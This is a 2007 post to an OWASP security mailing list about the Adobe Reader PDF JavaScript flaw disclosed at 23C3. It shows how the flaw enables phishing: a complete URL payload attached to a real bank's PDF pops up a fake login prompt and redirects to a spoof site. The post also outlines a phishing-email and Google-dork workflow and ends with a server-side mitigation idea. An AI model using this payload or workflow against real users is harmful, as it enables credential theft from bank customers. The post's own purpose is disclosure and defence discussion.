[Owasp-sydney] XSS/Phising with PDF

Jean-Jacques Halans halans at gmail.com
Wed Jan 3 17:55:13 EST 2007


Dear all,
First of: Happy New Year to all.

There's currently a lot of chatter on the securityfocus mailing list
about the pdf-javascript vulnerability disclosed by Stefano Di Paola
and Giorgio Fedon last week at 23C3 in Berlin,
making new ajaxy worms possible. Adobe did put out an Acrobat fix, but
lots of people don't often upgrade Acrobat reader.

In my opinion, it also makes for a big phishing hole (works in Firefox
2, doesn't seem to in IE6, button other opportunities may exist, it
seems to be combinations of versions of browsers/acrobat).
Google for any banking pdf's (for example using something like
site:abankingsite.com filetype:pdf) and attach your fake banking site
to let the user login to read the article.

For example:
Send out an email pretending to come from (for example) Citibank,
about a new article on Wealth Management, with a link to the real
article:
http://www.citibank.com/privatebank/np_on_wm.pdf#something=javascript:var%20url=%22http://www.citibank.com/privatebank/%22;var%20temp=confirm(%22Dear%20Citibank%20Customer,\n\nPlease%20login%20to%20read%20the%20article.\nAfter%20login%20you%20will%20be%20returned%20to%20the%20article.\n\n%22);var%20url2=%22http://www.somecitibankspoofurl.com/fake_login_page%22;if(temp){document.location=url2}else{document.location=url}
Notice the popup (in firefox) which says: "The page at
http://www.citibank.com says:"

Pdf links regularly shouldn't really have any request parameters
attached, so for pdf requests the server might try to check on any
attached parameters and redirect the user.
Although Adobe does provide support for so called "open parameters":
http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf

Regards
JJ

-- 
Halans Jean-Jacques

================================
> http://www.halans.be
> http://del.icio.us/halans
================================


More information about the Owasp-sydney mailing list